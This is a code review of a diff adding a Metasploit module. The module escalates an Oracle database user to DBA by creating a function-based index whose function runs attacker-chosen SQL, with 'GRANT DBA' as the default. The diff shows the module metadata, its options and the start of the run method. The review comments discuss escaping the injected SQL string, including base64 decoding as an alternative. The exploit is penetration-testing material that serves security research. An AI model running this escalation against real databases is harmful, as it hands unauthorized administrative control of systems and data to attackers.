modules/auxiliary/admin/oracle/oracle_index_privesc.rb

```diff
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::ORACLE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Oracle DB Privilege Escalation via function-based index',
+      'Description'    => %q{
+        This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique.
+      },
+      'Author'         =>
+        [
+          'David Litchfield', # Vulnerability discovery and exploit
+          'Moshe Kaplan',     # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf' ],
+        ],
+      'DisclosureDate' => 'Jan 21 2015'))
+
+      register_options(
+        [
+          OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
+          OptString.new('TABLE', [ true, 'Table to create the index on.', "SYS.DUAL"]),
+        ])
+  end
+
+  def run
+    return if !check_dependencies
+
+    name = Rex::Text.rand_text_alpha(rand(5) + 1)
+
+    func_name = "GETDBA_#{datastore['DBUSER']}_#{name}"
+    create_function = "
+      CREATE OR REPLACE FUNCTION #{func_name}
+      (FOO varchar) return varchar
+      deterministic authid current_user is
+      pragma autonomous_transaction;
+      begin
+      execute immediate '#{datastore['SQL']}';
```

Comment:
Presumably some sort of escaping needs to be performed on `datastore['SQL']` as it's being inserted between single quotes.

Reply:
Something like `Regexp.escape` might work here.

Reply:
As per discussion on IRC, the easiest approach may be to escape single quotes, and let the user deal with other escaping themselves. This way the user won't need to read the module source to figure out whether they should be escaping `'` or `"`.

Something like this:

```ruby
      execute immediate '#{datastore['SQL'].gsub("'", "\\\\'")}';
```

Alternatively, if the DBMS supports dynamic evaluation functions by default, such as base64 decoding or hex decoding, then these could be used instead.

Something like (psuedocode):

```ruby
      execute immediate ORACLE_BUILTIN_BASE64DECODE_FUNCTION('#{Rex::Text.encode_base64(datastore['SQL'])}');
```